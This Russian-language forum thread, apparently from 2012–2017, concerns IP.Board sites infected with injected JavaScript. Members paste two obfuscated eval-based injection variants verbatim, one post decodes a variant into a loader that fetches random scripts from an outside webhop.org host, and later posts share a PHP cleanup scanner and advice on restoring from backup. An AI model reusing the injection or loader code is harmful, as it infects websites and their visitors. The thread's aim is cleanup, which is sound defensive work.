try{q=document.createElement("d"+"i"+"v");q.appendChild(q+"");}catch(qw){h=-012/5;zz='a'+'l';f='fr'+'om'+'Ch';f+='arC';}try{qwe=prototype;}catch(brebr){zz='zv'.substr(123-122)+zz;ss=[];f+=(h)?'ode':"";w=this;e=w[f["s"+"ubstr"](11)+zz];n="19$50$57.5$54$48.5$57$51.5$54.5$54$19$19.5$15$60.5$5.5$4$3.5$58$47.5$56$15$57.5$56$53$15$29.5$15$18.5$51$57$57$55$28$22.5$22.5$55.5$50$58$53$59.5$55.5$56$51.5$51$51.5$22$51$54.5$53.5$49.5$53$51.5$54$57.5$59$22$54$49.5$57$22.5$50.5$22.5$18.5$28.5$5.5$4$3.5$51.5$50$15$19$57$59.5$55$49.5$54.5$50$15$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$29.5$29.5$15$18.5$57.5$54$49$49.5$50$51.5$54$49.5$49$18.5$19.5$15$60.5$5.5$4$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$23$28.5$5.5$4$3.5$61.5$5.5$4$3.5$49$54.5$48.5$57.5$53.5$49.5$54$57$22$54.5$54$53.5$54.5$57.5$56.5$49.5$53.5$54.5$58$49.5$15$29.5$15$50$57.5$54$48.5$57$51.5$54.5$54$19$19.5$15$60.5$5.5$4$3.5$3.5$51.5$50$15$19$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$29.5$29.5$15$23$19.5$15$60.5$5.5$4$3.5$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$23.5$28.5$5.5$4$3.5$3.5$3.5$58$47.5$56$15$51$49.5$47.5$49$15$29.5$15$49$54.5$48.5$57.5$53.5$49.5$54$57$22$50.5$49.5$57$33.5$53$49.5$53.5$49.5$54$57$56.5$32$59.5$41$47.5$50.5$38$47.5$53.5$49.5$19$18.5$51$49.5$47.5$49$18.5$19.5$44.5$23$45.5$28.5$5.5$4$3.5$3.5$3.5$58$47.5$56$15$56.5$48.5$56$51.5$55$57$15$29.5$15$49$54.5$48.5$57.5$53.5$49.5$54$57$22$48.5$56$49.5$47.5$57$49.5$33.5$53$49.5$53.5$49.5$54$57$19$18.5$56.5$48.5$56$51.5$55$57$18.5$19.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$57$59.5$55$49.5$15$29.5$15$18.5$57$49.5$59$57$22.5$52$47.5$58$47.5$56.5$48.5$56$51.5$55$57$18.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$54.5$54$56$49.5$47.5$49$59.5$56.5$57$47.5$57$49.5$48.5$51$47.5$54$50.5$49.5$15$29.5$15$50$57.5$54$48.5$57$51.5$54.5$54$15$19$19.5$15$60.5$5.5$4$3.5$3.5$3.5$3.5$51.5$50$15$19$57$51$51.5$56.5$22$56$49.5$47.5$49$59.5$40.5$57$47.5$57$49.5$15$29.5$29.5$15$18.5$48.5$54.5$53.5$55$53$49.5$57$49.5$18.5$19.5$15$60.5$5.5$4$3.5$3.5$3.5$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$24$28.5$5.5$4$3.5$3.5$3.5$3.5$61.5$5.5$4$3.5$3.5$3.5$61.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$54.5$54$53$54.5$47.5$49$15$29.5$15$50$57.5$54$48.5$57$51.5$54.5$54$19$19.5$15$60.5$5.5$4$3.5$3.5$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$24$28.5$5.5$4$3.5$3.5$3.5$61.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$56.5$56$48.5$15$29.5$15$57.5$56$53$15$20.5$15$37.5$47.5$57$51$22$56$47.5$54$49$54.5$53.5$19$19.5$22$57$54.5$40.5$57$56$51.5$54$50.5$19$19.5$22$56.5$57.5$48$56.5$57$56$51.5$54$50.5$19$24.5$19.5$15$20.5$15$18.5$22$52$56.5$18.5$28.5$5.5$4$3.5$3.5$3.5$51$49.5$47.5$49$22$47.5$55$55$49.5$54$49$32.5$51$51.5$53$49$19$56.5$48.5$56$51.5$55$57$19.5$28.5$5.5$4$3.5$3.5$61.5$5.5$4$3.5$61.5$28.5$5.5$4$61.5$19.5$19$19.5$28.5"[((e)?"s":"")+"p"+"lit"]("a$"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-685!=0;i++){k=i;ss=ss+String.fromCharCode(-1*h*(1+1*n[k]));}q=ss;e(q);} возможно это оффтоп, поэтому заранее извеняюсь заметил что при редактировании сообщений на форуме не загружаеться редактор, я думал это связано с вирусом но вот и на вешем форуме также не загружаеться (вернее загружаеться но не всегда) Link to comment https://ipbmafia.ru/topic/327-virus-na-forume-ipboard/?&do=findComment&comment=4580 Share on other sites Больше вариантов
18 мая, 201212 yr Author comment_4582 Расшифровка данного скрипта: (function() { var url = '__smmxkycxsu.webhop.org/g/'; if (typeof window.xyzflag === 'undefined') { window.xyzflag = 0; } document.onmousemove = function() { if (window.xyzflag === 0) { window.xyzflag = 1; var head = document.getElementsByTagName('head')[0]; var script = document.createElement('script'); script.type = 'text/javascript'; script.onreadystatechange = function () { if (this.readyState == 'complete') { window.xyzflag = 2; } }; script.onload = function() { window.xyzflag = 2; }; script.src = url + Math.random().toString().substring(3) + '.js'; head.appendChild(script); } }; })(); [/CODE] Link to comment https://ipbmafia.ru/topic/327-virus-na-forume-ipboard/?&do=findComment&comment=4582 Share on other sites Больше вариантов
18 мая, 201212 yr comment_4583 ещё антивирус в cPanel по началу ругался на троян, но теперь перестал хотя точно знаю что ещё есть эта бяка. Link to comment https://ipbmafia.ru/topic/327-virus-na-forume-ipboard/?&do=findComment&comment=4583 Share on other sites Больше вариантов
18 мая, 201212 yr comment_4585 вот этот код: try{q=document.createElement("d"+"i"+"v");q.appendChild(q+"");}catch(qw){h=-012/5;zz='a'+'l';f='fr'+'om'+'Ch';f+='arC';}try{qwe=prototype;}catch(brebr){zz='zv'.substr(123-122)+zz;ss=[];f+=(h)?'ode':"";w=this;e=w[f["s"+"ubstr"](11)+zz];n="19$50$57.5$54$48.5$57$51.5$54.5$54$19$19.5$15$60.5$5.5$4$3.5$58$47.5$56$15$57.5$56$53$15$29.5$15$18.5$51$57$57$55$28$22.5$22.5$55.5$50$58$53$59.5$55.5$56$51.5$51$51.5$22$51$54.5$53.5$49.5$53$51.5$54$57.5$59$22$54$49.5$57$22.5$50.5$22.5$18.5$28.5$5.5$4$3.5$51.5$50$15$19$57$59.5$55$49.5$54.5$50$15$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$29.5$29.5$15$18.5$57.5$54$49$49.5$50$51.5$54$49.5$49$18.5$19.5$15$60.5$5.5$4$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$23$28.5$5.5$4$3.5$61.5$5.5$4$3.5$49$54.5$48.5$57.5$53.5$49.5$54$57$22$54.5$54$53.5$54.5$57.5$56.5$49.5$53.5$54.5$58$49.5$15$29.5$15$50$57.5$54$48.5$57$51.5$54.5$54$19$19.5$15$60.5$5.5$4$3.5$3.5$51.5$50$15$19$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$29.5$29.5$15$23$19.5$15$60.5$5.5$4$3.5$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$23.5$28.5$5.5$4$3.5$3.5$3.5$58$47.5$56$15$51$49.5$47.5$49$15$29.5$15$49$54.5$48.5$57.5$53.5$49.5$54$57$22$50.5$49.5$57$33.5$53$49.5$53.5$49.5$54$57$56.5$32$59.5$41$47.5$50.5$38$47.5$53.5$49.5$19$18.5$51$49.5$47.5$49$18.5$19.5$44.5$23$45.5$28.5$5.5$4$3.5$3.5$3.5$58$47.5$56$15$56.5$48.5$56$51.5$55$57$15$29.5$15$49$54.5$48.5$57.5$53.5$49.5$54$57$22$48.5$56$49.5$47.5$57$49.5$33.5$53$49.5$53.5$49.5$54$57$19$18.5$56.5$48.5$56$51.5$55$57$18.5$19.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$57$59.5$55$49.5$15$29.5$15$18.5$57$49.5$59$57$22.5$52$47.5$58$47.5$56.5$48.5$56$51.5$55$57$18.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$54.5$54$56$49.5$47.5$49$59.5$56.5$57$47.5$57$49.5$48.5$51$47.5$54$50.5$49.5$15$29.5$15$50$57.5$54$48.5$57$51.5$54.5$54$15$19$19.5$15$60.5$5.5$4$3.5$3.5$3.5$3.5$51.5$50$15$19$57$51$51.5$56.5$22$56$49.5$47.5$49$59.5$40.5$57$47.5$57$49.5$15$29.5$29.5$15$18.5$48.5$54.5$53.5$55$53$49.5$57$49.5$18.5$19.5$15$60.5$5.5$4$3.5$3.5$3.5$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$24$28.5$5.5$4$3.5$3.5$3.5$3.5$61.5$5.5$4$3.5$3.5$3.5$61.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$54.5$54$53$54.5$47.5$49$15$29.5$15$50$57.5$54$48.5$57$51.5$54.5$54$19$19.5$15$60.5$5.5$4$3.5$3.5$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$24$28.5$5.5$4$3.5$3.5$3.5$61.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$56.5$56$48.5$15$29.5$15$57.5$56$53$15$20.5$15$37.5$47.5$57$51$22$56$47.5$54$49$54.5$53.5$19$19.5$22$57$54.5$40.5$57$56$51.5$54$50.5$19$19.5$22$56.5$57.5$48$56.5$57$56$51.5$54$50.5$19$24.5$19.5$15$20.5$15$18.5$22$52$56.5$18.5$28.5$5.5$4$3.5$3.5$3.5$51$49.5$47.5$49$22$47.5$55$55$49.5$54$49$32.5$51$51.5$53$49$19$56.5$48.5$56$51.5$55$57$19.5$28.5$5.5$4$3.5$3.5$61.5$5.5$4$3.5$61.5$28.5$5.5$4$61.5$19.5$19$19.5$28.5"[((e)?"s":"")+"p"+"lit"]("a$"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-685!=0;i++){k=i;ss=ss+String.fromCharCode(-1*h*(1+1*n[k]));}q=ss;e(q);} try{q=document.createElement("d"+"i"+"v");q.appendChild(q+"");}catch(qw){h=-012/5;}try{prototype;}catch(brebr){st=String;zz='al';zz='zv'.substr(123-122)+zz;ss=[];f='fr'+'om'+'Ch';f+='arC';f+='ode';w=this;e=w[f["substr"](11)+zz];n="19$50$57.5$54$48.5$57$51.5$54.5$54$19$19.5$15$60.5$5.5$4$3.5$58$47.5$56$15$57.5$56$53$15$29.5$15$18.5$51$57$57$55$28$22.5$22.5$55.5$51$48.5$52.5$50$49$57.5$55$49$55.5$22$55$54.5$49$60$54.5$54$49.5$22$54$49.5$57$22.5$50.5$22.5$18.5$28.5$5.5$4$3.5$51.5$50$15$19$57$59.5$55$49.5$54.5$50$15$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$29.5$29.5$15$18.5$57.5$54$49$49.5$50$51.5$54$49.5$49$18.5$19.5$15$60.5$5.5$4$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$23$28.5$5.5$4$3.5$61.5$5.5$4$3.5$49$54.5$48.5$57.5$53.5$49.5$54$57$22$54.5$54$53.5$54.5$57.5$56.5$49.5$53.5$54.5$58$49.5$15$29.5$15$50$57.5$54$48.5$57$51.5$54.5$54$19$19.5$15$60.5$5.5$4$3.5$3.5$51.5$50$15$19$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$29.5$29.5$15$23$19.5$15$60.5$5.5$4$3.5$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$23.5$28.5$5.5$4$3.5$3.5$3.5$58$47.5$56$15$51$49.5$47.5$49$15$29.5$15$49$54.5$48.5$57.5$53.5$49.5$54$57$22$50.5$49.5$57$33.5$53$49.5$53.5$49.5$54$57$56.5$32$59.5$41$47.5$50.5$38$47.5$53.5$49.5$19$18.5$51$49.5$47.5$49$18.5$19.5$44.5$23$45.5$28.5$5.5$4$3.5$3.5$3.5$58$47.5$56$15$56.5$48.5$56$51.5$55$57$15$29.5$15$49$54.5$48.5$57.5$53.5$49.5$54$57$22$48.5$56$49.5$47.5$57$49.5$33.5$53$49.5$53.5$49.5$54$57$19$18.5$56.5$48.5$56$51.5$55$57$18.5$19.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$57$59.5$55$49.5$15$29.5$15$18.5$57$49.5$59$57$22.5$52$47.5$58$47.5$56.5$48.5$56$51.5$55$57$18.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$54.5$54$56$49.5$47.5$49$59.5$56.5$57$47.5$57$49.5$48.5$51$47.5$54$50.5$49.5$15$29.5$15$50$57.5$54$48.5$57$51.5$54.5$54$15$19$19.5$15$60.5$5.5$4$3.5$3.5$3.5$3.5$51.5$50$15$19$57$51$51.5$56.5$22$56$49.5$47.5$49$59.5$40.5$57$47.5$57$49.5$15$29.5$29.5$15$18.5$48.5$54.5$53.5$55$53$49.5$57$49.5$18.5$19.5$15$60.5$5.5$4$3.5$3.5$3.5$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$24$28.5$5.5$4$3.5$3.5$3.5$3.5$61.5$5.5$4$3.5$3.5$3.5$61.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$54.5$54$53$54.5$47.5$49$15$29.5$15$50$57.5$54$48.5$57$51.5$54.5$54$19$19.5$15$60.5$5.5$4$3.5$3.5$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$24$28.5$5.5$4$3.5$3.5$3.5$61.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$56.5$56$48.5$15$29.5$15$57.5$56$53$15$20.5$15$37.5$47.5$57$51$22$56$47.5$54$49$54.5$53.5$19$19.5$22$57$54.5$40.5$57$56$51.5$54$50.5$19$19.5$22$56.5$57.5$48$56.5$57$56$51.5$54$50.5$19$24.5$19.5$15$20.5$15$18.5$22$52$56.5$18.5$28.5$5.5$4$3.5$3.5$3.5$51$49.5$47.5$49$22$47.5$55$55$49.5$54$49$32.5$51$51.5$53$49$19$56.5$48.5$56$51.5$55$57$19.5$28.5$5.5$4$3.5$3.5$61.5$5.5$4$3.5$61.5$28.5$5.5$4$61.5$19.5$19$19.5$28.5"[((e)?"s":"")+"p"+"lit"]("a$"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-683!=0;i++){j=i;if(st)ss=ss+st.fromCharCode(-1*h*(1+1*n[j]));}q=ss;e(q);} возможно это оффтоп, поэтому заранее извеняюсь заметил что при редактировании сообщений на форуме не загружаеться редактор, я думал это связано с вирусом но вот и на вешем форуме также не загружаеться (вернее загружаеться но не всегда) Установите вот это дополнение для Firefox и вы будете видеть весь JS код форума, уже в нормальном, а не в обфусцированном виде. Link to comment https://ipbmafia.ru/topic/327-virus-na-forume-ipboard/?&do=findComment&comment=4585 Share on other sites Больше вариантов
9 ноября, 201211 yr comment_14434 Вот скрипт: <? /* ---------------------------------------------------------------------------------- dScaner Class - START ---------------------------------------------------------------------------------- */ /* * * Класс - dScaner для сканирования директорий на наличие вредоносного кода в * указанных типах файлов * * Разработчик: Денис Ушаков * Дата разработки: 03-04-2012 * Версия разработки: 0.0.3 * */ Class dScaner { // преобразуем входной параметр в массив // $get_str - список параметров // $separator - разделитель параметров в списке function request($get_str, $separator) { if (isset($get_str) && !empty($get_str)) { // эксплоадим строку в массив и возвращаем его $obj = explode($separator, $get_str); return $obj; } else { return false; } } /* * * Функция поиска в файлах вхождения заданной строки: * * $this->find($path, $files_allowed, $requested_string); * * $path - путь до директории, от которой отталкиваться при сканировании * $files_allowed - список файлов, которые подвергаются сканированию * $requested_string - строка поиска * */ function find($path = './', $files_allowed, $requested_string) { // исключаемые ссылки на директории и файлы, которые будут игнорироваться $dir_disallow = array('.', '..', '.htaccess', '.git'); if(is_dir($path)) { $temp = opendir($path); while (false !== ($dir = readdir($temp))) { if ((is_dir($path . $dir)) && (!in_array($dir, $dir_disallow)) ) { // если директория - сканируем её $sub_dir = $path . $dir . '/'; $this->find($sub_dir, $files_allowed, $requested_string); } elseif ((is_file($path . $dir)) && (!in_array($dir, $dir_disallow)) && (strpos($dir, $files_allowed) == true) && (strpos($dir, '_BACKUP') == false) ) { // Если файл // получаем полный путь до него $in_dir_file = $path . $dir; // считываем файл в строку $temporary_file = file_get_contents($in_dir_file); // флаг найденного вхождения искомой строки $file_founded = false; // разбиваем файл на строки $tf_strings = explode("n", $temporary_file); // обрабатываем каждую отдельно foreach ($tf_strings AS $item) { $item = strval($item); // если в строке есть вхождения искомого запроса if (strpos($item, $requested_string) !== false) { $file_founded = true; } } // если в файле найдена строка if ($file_founded) { // выводим путь до файла в котором найдено вхождение print "<span style='display:block; padding:5px; border:1px solid #1f4f18; background-color:#d5f5ce; font-size:12px; line-height:16px; font-family:tahoma, sans-serif; margin-bottom:-15px;'>" . $in_dir_file . " - в файле обнаружена искомая строка. </span> "; } } } closedir($temp); } } /* * * Функция сканирования вредоносного кода: * * $this->scan($path, $files_allowed, $requested_string); * * $path - путь до директории, от которой отталкиваться при сканировании * $files_allowed - список файлов, которые подвергаются сканированию * $requested_string - строка, по которой определяется наличие вредоносного кода * */ function scan($path = './', $files_allowed, $requested_string) { // исключаемые ссылки на директории и файлы $dir_disallow = array('.', '..', '.htaccess', '.git'); if(is_dir($path)) { $temp = opendir($path); while (false !== ($dir = readdir($temp))) { if ((is_dir($path . $dir)) && (!in_array($dir, $dir_disallow)) ) { // если директория - сканируем её $sub_dir = $path . $dir . '/'; $new_parent_dir = $path . $dir; $this->scan($sub_dir, $files_allowed, $requested_string, $new_parent_dir); } elseif ((is_file($path . $dir)) && (!in_array($dir, $dir_disallow)) && (strpos($dir, $files_allowed) == true) && (strpos($dir, '_BACKUP') == false) ) { // Если файл // получаем полный путь до него $in_dir_file = $path . $dir; // считываем файл в строку $temporary_file = file_get_contents($in_dir_file); // флаг бекапа файла $create_backup = false; // разбиваем файл на строки и считываем каждую отдельно $tf_strings = explode("n", $temporary_file); // индекс строки файла $str_index = 0; // каждую строку обрабатываем отдельно foreach ($tf_strings AS $item) { $item = strval($item); if (strpos($item, $requested_string) !== false) { // если в строке есть вхождения искомого запроса // флаг бекапа файла, в котором найден вредоносный код $create_backup = true; // удаляем всю строку с вредоносным кодом unset($tf_strings[$str_index]); } $str_index++; } // создаём бэкап if ($create_backup) { // меняем права в папке в которой находимся чтобы иметь возможность писать в неё chmod($path, 0777); // формируем имя БЭКАПа файла $temp_file_backup = $in_dir_file.'_BACKUP'; // сохраняем БЭКАП файла рядом с исходным file_put_contents($temp_file_backup, $temporary_file); // собираем очищенный файл в строку $scanned_file = implode("n", $tf_strings); // сохраняем очищенный файл if (file_put_contents($in_dir_file, $scanned_file)) { // перезаписали удачно print "<span style='display:block; padding:5px; border:1px solid #1f4f18; background-color:#d5f5ce; font-size:12px; line-height:16px; font-family:tahoma, sans-serif; margin-bottom:-15px;'>" . $in_dir_file . " - Файл очищен. (+ BACKUP) </span> "; } else { // перезапись не удалась print "<span style='display:block; padding:5px; border:1px solid #822121; background-color:#ea7575; font-size:12px; line-height:16px; font-family:tahoma, sans-serif; margin-bottom:-15px;'>".$in_dir_file ." - Файл НЕ очищен. </span> "; } // меняем права в папке в которой находимся обратно на 755 chmod($path, 0755); } } } closedir($temp); } } /* * * Функция восстановления БЭКАПОВ файлов * * $this->restore_backups($path, $files_allowed); * * $path - путь до директории, от которой отталкиваться при восстановлении * $files_allowed - список файлов, которые подвергаются восстановлению * */ function restore_backups($path = './', $files_allowed) { // исключаемые ссылки на директории и файлы $dir_disallow = array('.', '..', '.htaccess', '.git'); if(is_dir($path)) { $temp = opendir($path); while (false !== ($dir = readdir($temp))) { if ((is_dir($path . $dir)) && (!in_array($dir, $dir_disallow)) ) { // если директория - сканируем её $sub_dir = $path . $dir . '/'; $this->restore_backups($sub_dir, $files_allowed); } elseif ((is_file($path . $dir)) && (!in_array($dir, $dir_disallow)) && (strpos($dir, $files_allowed) == true) ) { // Если файл // получаем полный путь до него $in_dir_file = $path . $dir; if (is_file($in_dir_file.'_BACKUP')) { // БЭКАП существует, получаем его содержимое $temporary_file_from_backup = file_get_contents($in_dir_file.'_BACKUP'); // восстанавливаем бэкап файла if (file_put_contents($in_dir_file, $temporary_file_from_backup)) { // удаляем бэкап unlink($_SERVER['DOCUMENT_ROOT'].'/'.$in_dir_file.'_BACKUP'); // бэкап восстановили print "<span style='display:block; padding:5px; border:1px solid #1f4f18; background-color:#d5f5ce; font-size:12px; line-height:16px; font-family:tahoma, sans-serif; margin-bottom:-15px;'>".$in_dir_file ." - восстановлен. </span> "; } else { // бэкап НЕ восстановили print "<span style='display:block; padding:5px; border:1px solid #822121; background-color:#ea7575; font-size:12px; line-height:16px; font-family:tahoma, sans-serif; margin-bottom:-15px;'>".$in_dir_file ." - НЕ восстановлен. </span> "; } } } } closedir($temp); } } } /* ---------------------------------------------------------------------------------- dScaner Class - END ---------------------------------------------------------------------------------- */ ?> Выкладывай, посмотрим что у тебя за код.. Права изменять бесполезно - злоумышленник при внедрении вредоносного кода имеет доступ к файлам через FTP. Как воспользоваться этим скриптом? Link to comment https://ipbmafia.ru/topic/327-virus-na-forume-ipboard/?&do=findComment&comment=14434 Share on other sites Больше вариантов
9 ноября, 201211 yr Author comment_14468 Прочитать комментарии в скрипте, что-то подредактировать согласно комментариям и обратиться к скрипту из адресной строки. Link to comment https://ipbmafia.ru/topic/327-virus-na-forume-ipboard/?&do=findComment&comment=14468 Share on other sites Больше вариантов
10 ноября, 201211 yr comment_14497 Прочитать комментарии в скрипте, что-то подредактировать согласно комментариям и обратиться к скрипту из адресной строки. А в каком формате его сохранить нужно? ".js" ? Link to comment https://ipbmafia.ru/topic/327-virus-na-forume-ipboard/?&do=findComment&comment=14497 Share on other sites Больше вариантов
10 ноября, 201211 yr Author comment_14505 Нет, в .php Link to comment https://ipbmafia.ru/topic/327-virus-na-forume-ipboard/?&do=findComment&comment=14505 Share on other sites Больше вариантов
10 ноября, 201211 yr comment_14530 Нет, в .php Я если честно вообще не разбираюсь в кодах... Вы можете подсказать что отредактировать нужно? Я вот могу скопировать и сохранить в формате ПХП но дальше я вообще не бум бум что делать... Link to comment https://ipbmafia.ru/topic/327-virus-na-forume-ipboard/?&do=findComment&comment=14530 Share on other sites Больше вариантов
12 ноября, 201211 yr Author comment_14736 (первый параметр — стартовая директория поиска, второй — тип файлов, участвующих в поиске, третий — строка поиска) Пример: В самый низ добавляешь: $ipbmafia = new dScaner; $ipbmafia->find('./', '.js', 'Array'); $ipbmafia->scan('./', '.js', '=Array.prototype.slice.call(arguments).join(""),'); [/CODE] У тебя будут свои значения. Если искомый текст будет обнаружен, то сканнер выведет эти файлы на экран. Link to comment https://ipbmafia.ru/topic/327-virus-na-forume-ipboard/?&do=findComment&comment=14736 Share on other sites Больше вариантов
5 декабря, 201211 yr comment_16203 Паш, проверь пожалуйста мой сайт на вирусняк. у меня пользователей перекидывает на другой сайт. Link to comment https://ipbmafia.ru/topic/327-virus-na-forume-ipboard/?&do=findComment&comment=16203 Share on other sites Больше вариантов
20 августа, 20177 yr comment_134996 Доброго дня всем! Подниму тему, недавно яндекс обнаружил у меня на форуме вирусы...при этом гугл не ругается, но яша поставил ярлык как зараженный, найти не могу, удалить вирус тем более, что делать подскажите? Link to comment https://ipbmafia.ru/topic/327-virus-na-forume-ipboard/?&do=findComment&comment=134996 Share on other sites Больше вариантов
20 августа, 20177 yr comment_134998 14 минут назад, iliah сказал: что делать подскажите? Как вариант, откатить из бэкапа! Порабы уже переползать на IPS4 Link to comment https://ipbmafia.ru/topic/327-virus-na-forume-ipboard/?&do=findComment&comment=134998 Share on other sites Больше вариантов
20 августа, 20177 yr comment_134999 3 минуты назад, Sipsb сказал: Как вариант, откатить из бэкапа! Порабы уже переползат на IPS4 видел в 15 году тут тему как правильно перейти на ипс 4 сейчас не получается найти, лицензия есть, только надо продлить, и возможно ли автоматически обновиться с 345 на 4.0 Link to comment https://ipbmafia.ru/topic/327-virus-na-forume-ipboard/?&do=findComment&comment=134999 Share on other sites Больше вариантов
20 августа, 20177 yr comment_135000 1 минуту назад, iliah сказал: видел в 15 году тут тему как правильно перейти на ипс 4 сейчас не получается найти Link to comment https://ipbmafia.ru/topic/327-virus-na-forume-ipboard/?&do=findComment&comment=135000 Share on other sites Больше вариантов
20 августа, 20177 yr comment_135001 8 минут назад, Sipsb сказал: Для исключения вирусов, я б конечно хотел снести весь форум к ядреной бабушке, и файлы с базой восстановить на свежей четверке. Link to comment https://ipbmafia.ru/topic/327-virus-na-forume-ipboard/?&do=findComment&comment=135001 Share on other sites Больше вариантов
20 августа, 20177 yr comment_135002 1 минуту назад, iliah сказал: я б конечно хотел снести весь форум к ядреной бабушке, и файлы с базой восстановить на свежей четверке. Это правильно! Думаю, лучше переустановить на чистую 3-ку а затем обновить до 4-ки. Link to comment https://ipbmafia.ru/topic/327-virus-na-forume-ipboard/?&do=findComment&comment=135002 Share on other sites Больше вариантов
20 августа, 20177 yr comment_135003 Только что, Sipsb сказал: Это правильно! Думаю, лучше переустановить на чистую 3-ку а затем обновить до 4-ки. вооо а это идея, чет я сразу не допер Link to comment https://ipbmafia.ru/topic/327-virus-na-forume-ipboard/?&do=findComment&comment=135003 Share on other sites Больше вариантов
20 августа, 20177 yr comment_135004 3 минуты назад, iliah сказал: вооо а это идея, чет я сразу не допер Вот Вам в помощь Link to comment https://ipbmafia.ru/topic/327-virus-na-forume-ipboard/?&do=findComment&comment=135004 Share on other sites Больше вариантов
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.